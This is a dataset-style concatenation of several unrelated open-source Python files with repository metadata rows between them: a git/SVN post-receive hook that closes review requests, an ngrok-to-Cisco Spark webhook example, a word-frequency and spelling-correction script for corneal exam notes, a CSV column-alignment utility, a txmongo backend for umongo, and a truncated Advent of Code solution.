rsp = None
if rsp and 'errors' in rsp:
raise Exception('; '.join(rsp['errors']))
else:
raise Exception(six.text_type(e))
@require_POST
def process_post_receive_hook(request, *args, **kwargs):
"""Closes review requests as submitted automatically after a push."""
try:
server_url = get_server_url(request=request)
# Check if it's a git or an SVN repository and close accordingly.
if 'payload' in request.POST:
payload = json.loads(request.POST['payload'])
close_git_review_requests(payload, server_url)
else:
payload = json.loads(request.POST['commit'])
close_svn_review_request(payload, server_url)
except KeyError as e:
logging.error('There is no JSON payload in the POST request.: %s', e)
return HttpResponse(status=415)
except ValueError as e:
logging.error('The payload is not in JSON format: %s', e)
return HttpResponse(status=415)
return HttpResponse()
def close_git_review_requests(payload, server_url):
"""Closes all review requests for the git repository.
A git payload may contain multiple commits. If a commit's commit
message does not contain a review request ID, it closes based on
it's commit id.
"""
review_id_to_commits_map = defaultdict(list)
branch_name = payload.get('branch')
if not branch_name:
return review_id_to_commits_map
commits = payload.get('commits', [])
for commit in commits:
commit_hash = commit.get('id')
commit_message = commit.get('message')
review_request_id = get_review_request_id(commit_message, server_url,
commit_hash)
commit_entry = '%s (%s)' % (branch_name, commit_hash[:7])
review_id_to_commits_map[review_request_id].append(commit_entry)
close_all_review_requests(review_id_to_commits_map)
def close_svn_review_request(payload, server_url):
"""Closes the review request for an SVN repository.
The SVN payload may contains one commit. If a commit's commit
message does not contain a review request ID, it does not close
any review request.
"""
review_id_to_commits_map = defaultdict(list)
commit_message = payload.get('message')
branch_name = payload.get('changeset_url', 'SVN Repository')
revision = '%s %d' % ('Revision: ', payload.get('revision'))
review_request_id = get_review_request_id(commit_message, server_url,
None)
commit_entry = '%s (%s)' % (branch_name, revision)
review_id_to_commits_map[review_request_id].append(commit_entry)
close_all_review_requests(review_id_to_commits_map)
| 36.40636 | 79 | 0.635543 |
54adafbe1bcc7918e0b858de5b810dc2c1ee2d0b | 56 | py | Python | haystack/modeling/evaluation/__init__.py | ArzelaAscoIi/haystack | be8f50c9e3de4e264b3f345f5f4b9c9ec518ed08 | [
"Apache-2.0"
] | 1 | 2022-03-06T02:13:15.000Z | 2022-03-06T02:13:15.000Z | haystack/modeling/evaluation/__init__.py | ArzelaAscoIi/haystack | be8f50c9e3de4e264b3f345f5f4b9c9ec518ed08 | [
"Apache-2.0"
] | null | null | null | haystack/modeling/evaluation/__init__.py | ArzelaAscoIi/haystack | be8f50c9e3de4e264b3f345f5f4b9c9ec518ed08 | [
"Apache-2.0"
] | 1 | 2022-03-23T18:17:02.000Z | 2022-03-23T18:17:02.000Z | from haystack.modeling.evaluation.eval import Evaluator
| 28 | 55 | 0.875 |
ecaaebfca9f5b032cc0bae3ebaf7362524992f49 | 3,276 | py | Python | examples/ngrokwebhook.py | UniversalSuperBox/ciscosparkapi | 86ddb6a31d6dd5550bba05919ab2bdf924e0a81a | [
"MIT"
] | 2 | 2016-09-30T08:35:05.000Z | 2016-09-30T13:52:49.000Z | examples/ngrokwebhook.py | fadante/ciscosparkapi | 86ddb6a31d6dd5550bba05919ab2bdf924e0a81a | [
"MIT"
] | 1 | 2021-06-01T21:52:12.000Z | 2021-06-01T21:52:12.000Z | ciscosparkapi/examples/ngrokwebhook.py | Futuramistic/Bot | e22672e9d627faf3d9393feb04d214cb62dec98d | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Sample script to read local ngrok info and create a corresponding webhook.
Sample script that reads ngrok info from the local ngrok client api and creates
a Cisco Spark Webhook pointint to the ngrok tunnel's public HTTP URL.
Typically ngrok is called run with the following syntax to redirect an
Internet accesible ngrok url to localhost port 8080:
$ ngrok http 8080
To use script simply launch ngrok, and then launch this script. After ngrok is
killed, run this script a second time to remove webhook from Cisco Spark.
"""
# Use future for Python v2 and v3 compatibility
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
from builtins import *
__author__ = "Brad Bester"
__author_email__ = "brbester@cisco.com"
__contributors__ = ["Chris Lunsford <chrlunsf@cisco.com>"]
__copyright__ = "Copyright (c) 2016-2018 Cisco and/or its affiliates."
__license__ = "MIT"
import sys
from ciscosparkapi import CiscoSparkAPI
import requests
# Find and import urljoin
if sys.version_info[0] < 3:
from urlparse import urljoin
else:
from urllib.parse import urljoin
# Constants
NGROK_CLIENT_API_BASE_URL = "http://localhost:4040/api"
WEBHOOK_NAME = "ngrok_webhook"
WEBHOOK_URL_SUFFIX = "/sparkwebhook"
WEBHOOK_RESOURCE = "messages"
WEBHOOK_EVENT = "created"
def get_ngrok_public_url():
"""Get the ngrok public HTTP URL from the local client API."""
try:
response = requests.get(url=NGROK_CLIENT_API_BASE_URL + "/tunnels",
headers={'content-type': 'application/json'})
response.raise_for_status()
except requests.exceptions.RequestException:
print("Could not connect to the ngrok client API; "
"assuming not running.")
return None
else:
for tunnel in response.json()["tunnels"]:
if tunnel.get("public_url", "").startswith("http://"):
print("Found ngrok public HTTP URL:", tunnel["public_url"])
return tunnel["public_url"]
def delete_webhooks_with_name(spark_api, name):
"""Find a webhook by name."""
for webhook in spark_api.webhooks.list():
if webhook.name == name:
print("Deleting Webhook:", webhook.name, webhook.targetUrl)
spark_api.webhooks.delete(webhook.id)
def create_ngrok_webhook(spark_api, ngrok_public_url):
"""Create a Cisco Spark webhook pointing to the public ngrok URL."""
print("Creating Webhook...")
webhook = spark_api.webhooks.create(
name=WEBHOOK_NAME,
targetUrl=urljoin(ngrok_public_url, WEBHOOK_URL_SUFFIX),
resource=WEBHOOK_RESOURCE,
event=WEBHOOK_EVENT,
)
print(webhook)
print("Webhook successfully created.")
return webhook
def main():
"""Delete previous webhooks. If local ngrok tunnel, create a webhook."""
spark_api = CiscoSparkAPI()
delete_webhooks_with_name(spark_api, name=WEBHOOK_NAME)
public_url = get_ngrok_public_url()
if public_url is not None:
create_ngrok_webhook(spark_api, public_url)
if __name__ == '__main__':
main()
| 30.055046 | 80 | 0.677656 |
321d6c264d4289cc108340026665de3d2fed115e | 7,295 | py | Python | Code/3_wrongly_spelled_correctly_spelled_pair.py | kdpsingh/cornea-nlp | 8db0a2a4a9b4526d332efc096b94030b6158c9d1 | [
"MIT"
] | null | null | null | Code/3_wrongly_spelled_correctly_spelled_pair.py | kdpsingh/cornea-nlp | 8db0a2a4a9b4526d332efc096b94030b6158c9d1 | [
"MIT"
] | null | null | null | Code/3_wrongly_spelled_correctly_spelled_pair.py | kdpsingh/cornea-nlp | 8db0a2a4a9b4526d332efc096b94030b6158c9d1 | [
"MIT"
] | 1 | 2019-05-30T03:49:05.000Z | 2019-05-30T03:49:05.000Z | #!/usr/bin/env python
# coding: utf-8
import pandas as pd
import numpy as np
import string
from io import StringIO
import time
from functools import reduce
import itertools
import operator
import pyspark
from pyspark.sql.types import *
from pyspark.sql import *
from pyspark import SparkConf, SparkContext
from pyspark.sql.functions import col
import nltk
from nltk import RegexpTokenizer
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.corpus import stopwords as nltkstopwords
from nltk.corpus import wordnet
from nltk.stem.porter import *
from nltk import edit_distance
from autocorrect import spell
get_ipython().run_line_magic('matplotlib', 'inline')
nltk.download('stopwords')
nltk.download('wordnet')
##data readin
inp_path = 'encounter_notes_12.csv'
dat=open(inp_path,errors='ignore',)
dat=dat.read()
test = StringIO(dat)
df = pd.read_csv(test, sep=",",na_values=" ")
left_eye ='SLE_L_CORNEA_1020'
right_eye ='SLE_R_CORNEA_1013'
patid = 'PAT_ID'
## combine left and right eye description
df['description'] = df[left_eye].map(str) +' '+ df[right_eye].map(str)
## setting spark environment
conf = SparkConf().setAppName("wd_count")
sc = SparkContext(conf=conf)
sqlCtx = SQLContext(sc)
ps_df=sqlCtx.createDataFrame(df[[patid,'description']])
## from pyspark.df to pyspark rdd, get word frequency
Rdd=ps_df.rdd
wd_ct=Rdd.map(lambda x: [x[0],x[1].lower().strip().split()]).flatMap(lambda x: [tuple([x[0], x[1][i].strip(string.punctuation)]) for i in range(0,len(x[1]))]).map(lambda x: (x, 1)).reduceByKey(lambda x, y: x + y).sortBy(lambda x: -x[0]).map(lambda x:[x[0][0],x[0][1],x[1]]).toDF()
## print col name
wd_ct.printSchema()
## rename cols
wd_ct = wd_ct.selectExpr("_1 as PAT_ID","_2 as word", "_3 as cts")
## aggregate words together by summing frequency
words=wd_ct.groupBy("word").agg({"cts": "sum"}).sort(col("sum(cts)").desc())
## transform to pandas df
pd_words=words.toPandas().sort_values('word')
pd_words.sort_values('word').head(10)
#correction('wiht')
#start = timeit.timeit()
#newlist = list(map(correction, pd_words['word'].tolist()))
#end = timeit.timeit()
#print(end - start)
## tokenizing
tokenizer = RegexpTokenizer(r'[a-zA-Z]+')
tokens = tokenizer.tokenize(' '.join(pd_words['word'].tolist()))
pd_words=pd_words.loc[pd_words['word'].isin(tokens)]
##spelling correction
start = time.time()
corrected=list(map(spell, pd_words['word'].tolist()))
end = time.time()
print(end-start)
pd_words['corrected']=pd.Series(corrected,index=pd_words.index)
##remove stopwords
nonstopwords = [wd for wd in corrected if wd not in nltkstopwords.words('english')]
pd_words=pd_words.loc[pd_words['corrected'].isin(nonstopwords)]
##stemming
stemmer = PorterStemmer()
words1 = [stemmer.stem(word) for word in pd_words['corrected'].tolist()]
pd_words['stemmer']=pd.Series(words1,index=pd_words.index)
#lmtzr = WordNetLemmatizer()
#words2 = [lmtzr.lemmatize(word) for word in pd_words['corrected'].tolist()]
#pd_words['lmtzr']=pd.Series(words2,index=pd_words.index)
#nonstopwords = [wd for wd in pd_words.word if wd not in nltkstopwords.words('english')]
#pd_words=pd_words.loc[pd_words['corrected'].isin(nonstopwords)]
## aggregate words with same stemmer
a=pd_words.groupby('stemmer')['word'].apply(lambda x: ', '.join(x)).to_frame()
b=pd_words.groupby('stemmer')['sum(cts)'].sum().to_frame()
combined= pd.concat([a, b], axis=1)
combined=combined[combined.index.isin(['nan'])==False ]
combined=combined.reset_index()
def Prob(word, N=sum(pd_words['sum(cts)'])):
"Probability of `word`."
return pd_words[pd_words.word==word]['sum(cts)'].values/ N
def correction(lst_of_word):
"Most probable spelling correction for word."
return max(lst_of_word, key=Prob)
corrected=[]
for i in range (0, len(combined)):
corrected.append(correction(combined.word.iloc[i].split(', ')))
combined['stemmed_corrected']=pd.Series(corrected, index=combined.index)
cols=['stemmer','stemmed_corrected','word', 'sum(cts)']
combined = combined[cols]
newlist=combined.stemmer.tolist()
needed=list()
for i in newlist:
if len(i)>=2:
needed.append(i)
combined=combined[combined.stemmer.isin(needed)==True ]
def closed_wd(lst):
'''find close words using leveinshtein distance'''
pairs = [[lst[w1], lst[w2]] for w1 in range(len(lst)) for w2 in range(w1+1,len(lst))]
closed_pairs=list()
for i in pairs:
if edit_distance(i[0], i[1])<max(len(i[0])/5,len(i[1])/5):
if i[0][:2]==i[1][:2]:
i.sort()
closed_pairs.append(i)
closed_pairs = [list(x) for x in set(tuple(x) for x in closed_pairs)]
LL = set(itertools.chain.from_iterable(closed_pairs))
for each in LL:
components = [x for x in closed_pairs if each in x]
for i in components:
closed_pairs.remove(i)
closed_pairs += [list(set(itertools.chain.from_iterable(components)))]
closed_pairs = [list(x) for x in set(tuple(x) for x in closed_pairs)]
return closed_pairs
#closed_wd(combined.stemmed_corrected.tolist())
newlist=combined.stemmed_corrected.tolist()
sim=closed_wd(newlist)
#newlist=combined.stemmer.tolist()
#simil_list3=closed_wd(newlist)
sub=combined[combined.stemmed_corrected.isin(reduce(operator.concat, sim))]
combined=combined[combined.stemmed_corrected.isin(reduce(operator.concat, sim))==False]
## assign same group to similar words
groups=list(['na']*sub.shape[0])
for j in range(0,len(sub)):
for i in range(0,len(sim)):
if sub.stemmed_corrected.iloc[j] in sim[i]:
groups[j]=i
sub['groups'] = pd.Series(groups, index=sub.index)
## aggregation
a=sub.groupby('groups')['stemmer'].apply(lambda x: ', '.join(x)).to_frame()
b=sub.groupby('groups')['word'].apply(lambda x: ', '.join(x)).to_frame()
c=sub.groupby('groups')['sum(cts)'].sum().to_frame()
d=sub.groupby('groups')['stemmed_corrected'].apply(lambda x: ', '.join(x)).to_frame()
grouped_sub= pd.concat([a, b,c,d], axis=1)
## updating corrected word by frequency
corrected=[]
for i in range (0, len(grouped_sub)):
corrected.append(correction(grouped_sub.word.iloc[i].split(', ')))
grouped_sub['stemmed_corrected']= pd.Series(corrected, index=grouped_sub.index)
grouped_sub['stemmer']=pd.Series([stemmer.stem(word) for word in corrected], index=grouped_sub.index)
combined=combined.append(grouped_sub, ignore_index=True)
combined=combined[['stemmer','stemmed_corrected','word','sum(cts)']].sort_values('sum(cts)',ascending=False)
epi_index=combined[combined.stemmed_corrected=='epi'].index.values[0]
combined.loc[epi_index,'sum(cts)']
defect_index=combined[combined.stemmed_corrected=='defect'].index.values[0]
combined.loc[defect_index,'sum(cts)']
if 'epidefect' in combined.stemmed_corrected.tolist():
cts=combined[combined.stemmed_corrected=='epidefect']['sum(cts)'].values[0]
epi_index=combined[combined.stemmed_corrected=='epi'].index.values[0]
defect_index=combined[combined.stemmed_corrected=='defect'].index.values[0]
combined = combined[combined.stemmed_corrected != 'epidefect']
combined.loc[epi_index,'sum(cts)']=combined.loc[epi_index,'sum(cts)']+cts
combined.loc[defect_index,'sum(cts)']=combined.loc[defect_index,'sum(cts)']+cts
combined.to_csv('df_allvisits_correction.csv', sep=',')
| 29.534413 | 280 | 0.715422 |
5d17c317b2eb800883ba2b9752d8090050015037 | 10,228 | py | Python | md_utils/align_on_col.py | cmayes/md_utils | c74cab20f46b0adb98bdc9d2a19b3d21ff9d7516 | [
"BSD-3-Clause"
] | 1 | 2020-07-01T01:05:35.000Z | 2020-07-01T01:05:35.000Z | md_utils/align_on_col.py | cmayes/md_utils | c74cab20f46b0adb98bdc9d2a19b3d21ff9d7516 | [
"BSD-3-Clause"
] | 1 | 2017-12-01T21:58:38.000Z | 2017-12-01T21:58:38.000Z | md_utils/align_on_col.py | cmayes/md_utils | c74cab20f46b0adb98bdc9d2a19b3d21ff9d7516 | [
"BSD-3-Clause"
] | 4 | 2017-02-26T19:17:08.000Z | 2020-04-07T09:43:22.000Z | #!/usr/bin/env python
"""
For combining data from multiple files based on a common timestep. All other data will be ignored or, if in logging
mode, printed to a log file.
"""
from __future__ import print_function
from collections import defaultdict
import argparse
import os
import six
import sys
from md_utils.md_common import (InvalidDataError, warning, read_csv_to_dict, write_csv, create_out_fname,
longest_common_substring, file_rows_to_list)
__author__ = 'hmayes'
# Error Codes
# The good status code
GOOD_RET = 0
INPUT_ERROR = 1
IO_ERROR = 2
INVALID_DATA = 3
# Constants #
# Defaults
DEF_CMP_FILE = 'compare_list.txt'
DEF_DELIM = ','
DEF_ALIGN_COL_NAME = 'timestep'
DEF_OUT_FILE = 'comb.csv'
RUN_NAME = 'run'
def parse_cmdline(argv):
"""
Returns the parsed argument list and return code.
`argv` is a list of arguments, or `None` for ``sys.argv[1:]``.
"""
if argv is None:
argv = sys.argv[1:]
# initialize the parser object:
parser = argparse.ArgumentParser(description='Make combine output from multiple files, with a common column '
'name, printing only data from common column values. ')
parser.add_argument("-d", "--delimiter", help="The delimiter separating the file names in each row of the"
"compare_file_list. The default delimiter is '{}'.".format(DEF_DELIM),
default=DEF_DELIM)
parser.add_argument("-f", "--compare_file_list", help="The location of the file that lists the files to be "
"combined. Each row should contain a list of files to be "
"combined by aligning on the col_name. "
"The default file name is {}, located in the "
"directory where the program as run.".format(DEF_CMP_FILE),
default=DEF_CMP_FILE, type=file_rows_to_list)
parser.add_argument("-l", "--output_location", help="The location (directory) for output files. The default is the "
"directory from which the program was called.",
default=None)
parser.add_argument("-n", "--col_name", help="The common column name in the files used as the key to combine "
"files. The default file name is {}.".format(DEF_ALIGN_COL_NAME),
default=DEF_ALIGN_COL_NAME)
parser.add_argument("-o", "--out_name", help="The output file name. The default is {}.".format(DEF_OUT_FILE),
default=DEF_OUT_FILE)
parser.add_argument("-s", "--sep_out", help="A flag to specify a separate output files should be created for "
"the aligned files from each row of the compare_file_list. If this "
"is specified, the out_name will be used as a suffix. The base name "
"will be based on the common part of the names of the files to be "
"combined. If there is no common string, the output files will be "
"numbered based on their row number in the compare_file_list. Separate "
"output files will also be created if the column names from files on "
"different lines to not match.",
action='store_true')
args = None
try:
args = parser.parse_args(argv)
except IOError as e:
warning("Problems reading file:", e)
parser.print_help()
return args, IO_ERROR
except (KeyError, SystemExit) as e:
if hasattr(e, 'code') and e.code == 0:
return args, GOOD_RET
warning(e)
parser.print_help()
return args, INPUT_ERROR
return args, GOOD_RET
def process_files(comp_f_list, col_name, base_out_name, delimiter, sep_out_flag, out_location):
"""
Want to grab the timestep, first and 2nd mole found, first and 2nd ci^2
print the timestep, residue ci^2
@param comp_f_list: a list of lists of file names to process (file read during input processing)
@param col_name: name of column to use for alignment
@param base_out_name: name of file to be created, or suffix if multiple files to be created
@param delimiter: string, delimiter separating file names on lines of the comp_f_list
@param sep_out_flag: a boolean to note if separate output files should be made based on each row of input
@param out_location: user-specified location for the output files, if specified
@return: @raise InvalidDataError:
"""
all_dicts = defaultdict(dict)
# if need multiple output files, designate them by adding a prefix
prefix = ''
# if there will be multiple output files, make sure do not reuse a prefix, so keep copy of used names
prefix_used = []
# if one output file from multiple sets of file to combine, will change write_mode to append later
write_mode = 'w'
# we don't have to specify run names in the output if there one row set of files to combine,
# or if there will be separate output files
if len(comp_f_list) < 2 or sep_out_flag:
add_run_name = False
headers = []
else:
add_run_name = True
headers = [RUN_NAME]
for line_num, line in enumerate(comp_f_list):
dict_keys = None
if sep_out_flag:
headers = []
all_dicts = defaultdict(dict)
# separate on delimiter, strip any white space, and also get rid of empty entries
comp_files = list(filter(None, [c_file.strip() for c_file in line.split(delimiter)]))
# get the common part of the name, if it exists; otherwise, give the name the line index
for file_index, file_name in enumerate(comp_files):
base_name = os.path.splitext(os.path.basename(file_name))[0]
if file_index == 0:
run_name = base_name
else:
run_name = longest_common_substring(run_name, base_name)
if run_name == '':
# because will use run_name as a string, need to convert it
run_name = str(line_num) + "_"
for c_file in comp_files:
try:
new_dict = read_csv_to_dict(c_file, col_name)
except IOError:
raise InvalidDataError("Did not find file: {}"
"".format(c_file))
if dict_keys is None:
dict_keys = new_dict.keys()
else:
dict_keys = set(dict_keys).intersection(new_dict.keys())
new_dict_keys = six.next(six.itervalues(new_dict)).keys()
# Get the keys for the inner dictionary; diff methods for python 2 and 3 so use six
# expect to only get new headers when making a new file (write_mode == 'w')
# for the next file, will not gather more headers. When printed, extra cols will be skipped, and
# missing columns will have no data shown
if write_mode == 'w':
for key in new_dict_keys:
if key in headers:
# okay if already have header if the header is the column.
# If we are going to append, we also expect to already have the header name
if key != col_name:
warning("Non-unique column name {} found in {}. "
"Values will be overwritten.".format(key, c_file))
else:
headers.append(key)
for new_key in new_dict.items():
all_dicts[new_key[0]].update(new_key[1])
final_dict = []
for key in sorted(dict_keys):
final_dict.append(all_dicts[key])
# final_dict.append(all_dicts[key].update({RUN_NAME: run_name}))
if add_run_name:
for each_dict in final_dict:
each_dict.update({RUN_NAME: run_name})
# Possible to have no overlap in align column
if len(final_dict) > 0:
# make sure col_name appears first by taking it out before sorting
if sep_out_flag:
prefix = run_name
if prefix == '' or prefix in prefix_used:
prefix = str(line_num) + "_"
# have a consistent output by sorting the headers, but keep the aligning column first
# only needs to be done for printing the first time
if write_mode == 'w':
headers.remove(col_name)
headers = [col_name] + sorted(headers)
if add_run_name:
headers.remove(RUN_NAME)
headers = [RUN_NAME] + headers
f_name = create_out_fname(base_out_name, prefix=prefix, base_dir=out_location)
prefix_used.append(prefix)
write_csv(final_dict, f_name, headers, mode=write_mode)
if not sep_out_flag and write_mode == 'w':
write_mode = 'a'
else:
raise InvalidDataError("No common values found for column {} among files: {}"
"".format(col_name, ", ".join(comp_files)))
def main(argv=None):
# Read input
args, ret = parse_cmdline(argv)
if ret != GOOD_RET or args is None:
return ret
try:
process_files(args.compare_file_list, args.col_name, args.out_name,
args.delimiter, args.sep_out, args.output_location)
except IOError as e:
warning("Problems reading file:", e)
return IO_ERROR
except InvalidDataError as e:
warning("Problems reading data:", e)
return INVALID_DATA
return GOOD_RET # success
if __name__ == '__main__':
status = main()
sys.exit(status)
| 45.457778 | 120 | 0.582812 |
700e9f5df1f7c929fc43faf1d9967c0d2a7e8de7 | 12,621 | py | Python | umongo/frameworks/txmongo.py | voglster/umongo | 8434288c49762ab1bf6289c8499ad5c419647b05 | [
"MIT"
] | null | null | null | umongo/frameworks/txmongo.py | voglster/umongo | 8434288c49762ab1bf6289c8499ad5c419647b05 | [
"MIT"
] | null | null | null | umongo/frameworks/txmongo.py | voglster/umongo | 8434288c49762ab1bf6289c8499ad5c419647b05 | [
"MIT"
] | null | null | null | from twisted.internet.defer import (
inlineCallbacks, Deferred, DeferredList, returnValue, maybeDeferred)
from txmongo import filter as qf
from txmongo.database import Database
from pymongo.errors import DuplicateKeyError
import marshmallow as ma
from ..builder import BaseBuilder
from ..instance import Instance
from ..document import DocumentImplementation
from ..data_objects import Reference
from ..exceptions import NotCreatedError, UpdateError, DeleteError, NoneReferenceError
from ..fields import ReferenceField, ListField, EmbeddedField
from ..query_mapper import map_query
from .tools import cook_find_filter
class TxMongoDocument(DocumentImplementation):
__slots__ = ()
opts = DocumentImplementation.opts
@inlineCallbacks
def reload(self):
"""
Retrieve and replace document's data by the ones in database.
Raises :class:`umongo.exceptions.NotCreatedError` if the document
doesn't exist in database.
"""
if not self.is_created:
raise NotCreatedError("Document doesn't exists in database")
ret = yield self.collection.find_one(self.pk)
if ret is None:
raise NotCreatedError("Document doesn't exists in database")
self._data = self.DataProxy()
self._data.from_mongo(ret)
@inlineCallbacks
def commit(self, io_validate_all=False, conditions=None, replace=False):
"""
Commit the document in database.
If the document doesn't already exist it will be inserted, otherwise
it will be updated.
:param io_validate_all:
:param conditions: only perform commit if matching record in db
satisfies condition(s) (e.g. version number).
Raises :class:`umongo.exceptions.UpdateError` if the
conditions are not satisfied.
:param replace: Replace the document rather than update.
:return: A :class:`pymongo.results.UpdateResult` or
:class:`pymongo.results.InsertOneResult` depending of the operation.
"""
try:
if self.is_created:
if self.is_modified() or replace:
query = conditions or {}
query['_id'] = self.pk
# pre_update can provide additional query filter and/or
# modify the fields' values
additional_filter = yield maybeDeferred(self.pre_update)
if additional_filter:
query.update(map_query(additional_filter, self.schema.fields))
self.required_validate()
yield self.io_validate(validate_all=io_validate_all)
if replace:
payload = self._data.to_mongo(update=False)
ret = yield self.collection.replace_one(query, payload)
else:
payload = self._data.to_mongo(update=True)
ret = yield self.collection.update_one(query, payload)
if ret.matched_count != 1:
raise UpdateError(ret)
yield maybeDeferred(self.post_update, ret)
else:
ret = None
elif conditions:
raise NotCreatedError(
'Document must already exist in database to use `conditions`.'
)
else:
yield maybeDeferred(self.pre_insert)
self.required_validate()
yield self.io_validate(validate_all=io_validate_all)
payload = self._data.to_mongo(update=False)
ret = yield self.collection.insert_one(payload)
# TODO: check ret ?
self._data.set(self.pk_field, ret.inserted_id)
self.is_created = True
yield maybeDeferred(self.post_insert, ret)
except DuplicateKeyError as exc:
# Sort value to make testing easier for compound indexes
keys = sorted(exc.details['keyPattern'].keys())
try:
fields = [self.schema.fields[k] for k in keys]
except KeyError:
# A key in the index is unknwon from umongo
raise exc
if len(keys) == 1:
msg = fields[0].error_messages['unique']
raise ma.ValidationError({keys[0]: msg})
raise ma.ValidationError({
k: f.error_messages['unique_compound'].format(fields=keys)
for k, f in zip(keys, fields)
})
self._data.clear_modified()
return ret
@inlineCallbacks
def delete(self, conditions=None):
"""
Remove the document from database.
:param conditions: Only perform delete if matching record in db
satisfies condition(s) (e.g. version number).
Raises :class:`umongo.exceptions.DeleteError` if the
conditions are not satisfied.
Raises :class:`umongo.exceptions.NotCreatedError` if the document
is not created (i.e. ``doc.is_created`` is False)
Raises :class:`umongo.exceptions.DeleteError` if the document
doesn't exist in database.
:return: A :class:`pymongo.results.DeleteResult`
"""
if not self.is_created:
raise NotCreatedError("Document doesn't exists in database")
query = conditions or {}
query['_id'] = self.pk
# pre_delete can provide additional query filter
additional_filter = yield maybeDeferred(self.pre_delete)
if additional_filter:
query.update(map_query(additional_filter, self.schema.fields))
ret = yield self.collection.delete_one(query)
if ret.deleted_count != 1:
raise DeleteError(ret)
self.is_created = False
yield maybeDeferred(self.post_delete, ret)
return ret
def io_validate(self, validate_all=False):
"""
Run the io_validators of the document's fields.
:param validate_all: If False only run the io_validators of the
fields that have been modified.
"""
if validate_all:
return _io_validate_data_proxy(self.schema, self._data)
return _io_validate_data_proxy(
self.schema, self._data, partial=self._data.get_modified_fields())
@classmethod
@inlineCallbacks
def find_one(cls, filter=None, *args, **kwargs):
"""
Find a single document in database.
"""
filter = cook_find_filter(cls, filter)
ret = yield cls.collection.find_one(filter, *args, **kwargs)
if ret is not None:
ret = cls.build_from_mongo(ret, use_cls=True)
return ret
@classmethod
@inlineCallbacks
def find(cls, filter=None, *args, **kwargs):
"""
Find a list document in database.
Returns a list of Documents.
"""
filter = cook_find_filter(cls, filter)
raw_cursor_or_list = yield cls.collection.find(filter, *args, **kwargs)
return [cls.build_from_mongo(e, use_cls=True) for e in raw_cursor_or_list]
@classmethod
@inlineCallbacks
def find_with_cursor(cls, filter=None, *args, **kwargs):
"""
Find a list document in database.
Returns a cursor that provides Documents.
"""
filter = cook_find_filter(cls, filter)
raw_cursor_or_list = yield cls.collection.find_with_cursor(filter, *args, **kwargs)
def wrap_raw_results(result):
cursor = result[1]
if cursor is not None:
cursor.addCallback(wrap_raw_results)
return ([cls.build_from_mongo(e, use_cls=True) for e in result[0]], cursor)
return wrap_raw_results(raw_cursor_or_list)
@classmethod
def count(cls, filter=None, **kwargs):
"""
Get the number of documents in this collection.
"""
filter = cook_find_filter(cls, filter)
return cls.collection.count(filter=filter, **kwargs)
@classmethod
@inlineCallbacks
def ensure_indexes(cls):
"""
Check&create if needed the Document's indexes in database
"""
for index in cls.opts.indexes:
kwargs = index.document.copy()
keys = kwargs.pop('key')
index = qf.sort(keys.items())
yield cls.collection.create_index(index, **kwargs)
def _errback_factory(errors, field=None):
def errback(err):
if isinstance(err.value, ma.ValidationError):
if field is not None:
errors[field] = err.value.messages
else:
errors.extend(err.value.messages)
else:
raise err.value
return errback
# Run multiple validators and collect all errors in one
@inlineCallbacks
def _run_validators(validators, field, value):
errors = []
defers = []
for validator in validators:
try:
defer = validator(field, value)
except ma.ValidationError as exc:
errors.extend(exc.messages)
else:
assert isinstance(defer, Deferred), 'io_validate functions must return a Deferred'
defer.addErrback(_errback_factory(errors))
defers.append(defer)
yield DeferredList(defers)
if errors:
raise ma.ValidationError(errors)
@inlineCallbacks
def _io_validate_data_proxy(schema, data_proxy, partial=None):
errors = {}
defers = []
for name, field in schema.fields.items():
if partial and name not in partial:
continue
value = data_proxy.get(name)
if value is ma.missing:
continue
try:
if field.io_validate_recursive:
yield field.io_validate_recursive(field, value)
if field.io_validate:
defer = _run_validators(field.io_validate, field, value)
defer.addErrback(_errback_factory(errors, name))
defers.append(defer)
except ma.ValidationError as exc:
errors[name] = exc.messages
yield DeferredList(defers)
if errors:
raise ma.ValidationError(errors)
def _reference_io_validate(field, value):
return value.fetch(no_data=True)
@inlineCallbacks
def _list_io_validate(field, value):
validators = field.inner.io_validate
if not validators or not value:
return
errors = {}
defers = []
for idx, exc in enumerate(value):
defer = _run_validators(validators, field.inner, exc)
defer.addErrback(_errback_factory(errors, idx))
defers.append(defer)
yield DeferredList(defers)
if errors:
raise ma.ValidationError(errors)
def _embedded_document_io_validate(field, value):
return _io_validate_data_proxy(value.schema, value._data)
class TxMongoReference(Reference):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._document = None
@inlineCallbacks
def fetch(self, no_data=False, force_reload=False):
if not self._document or force_reload:
if self.pk is None:
raise NoneReferenceError('Cannot retrieve a None Reference')
self._document = yield self.document_cls.find_one(self.pk)
if not self._document:
raise ma.ValidationError(self.error_messages['not_found'].format(
document=self.document_cls.__name__))
returnValue(self._document)
class TxMongoBuilder(BaseBuilder):
BASE_DOCUMENT_CLS = TxMongoDocument
def _patch_field(self, field):
super()._patch_field(field)
validators = field.io_validate
if not validators:
field.io_validate = []
else:
if hasattr(validators, '__iter__'):
validators = list(validators)
else:
validators = [validators]
field.io_validate = validators
if isinstance(field, ListField):
field.io_validate_recursive = _list_io_validate
if isinstance(field, ReferenceField):
field.io_validate.append(_reference_io_validate)
field.reference_cls = TxMongoReference
if isinstance(field, EmbeddedField):
field.io_validate_recursive = _embedded_document_io_validate
class TxMongoInstance(Instance):
"""
:class:`umongo.instance.Instance` implementation for txmongo
"""
BUILDER_CLS = TxMongoBuilder
@staticmethod
def is_compatible_with(db):
return isinstance(db, Database)
| 35.855114 | 94 | 0.621742 |
88bafff1e0a32fd7cbaef256c6f2c1b43243e73c | 1,212 | py | Python | 2015/day-17/solution.py | bertptrs/adventofcode | 09b590e9276cb9bdb17d47ad73d1df24fa0093dc | [
"MIT"
] | 11 | 2017-12-19T09:54:43.000Z | 2022-01-27T22:31:11.000Z | 2015/day-17/solution.py | bertptrs/adventofcode | 09b590e9276cb9bdb17d47ad73d1df24fa0093dc | [
"MIT"
] | null | null | null | 2015/day-17/solution.py | bertptrs/adventofcode | 09b590e9276cb9bdb17d47ad73d1df24fa0093dc | [
"MIT"
] | 1 | 2020-12-02T09:23:46.000Z | 2020-12-02T09:23:46.000Z | from __future__ import print_function, division
import fileinput
from collections import defaultdict
import bisect
def value(buckets, choice):
total = 0
for value in buckets:
if choice % 2 == 1:
total += value
choice //= 2
return total
def ones(x):
n = 0
while x > 0:
if x % 2:
n += 1
x //= 2
return n
def partition(a_list):
pivot = len(a_list) // 2
return a_list[:pivot], a_list[pivot:]
def partitionList(buckets):
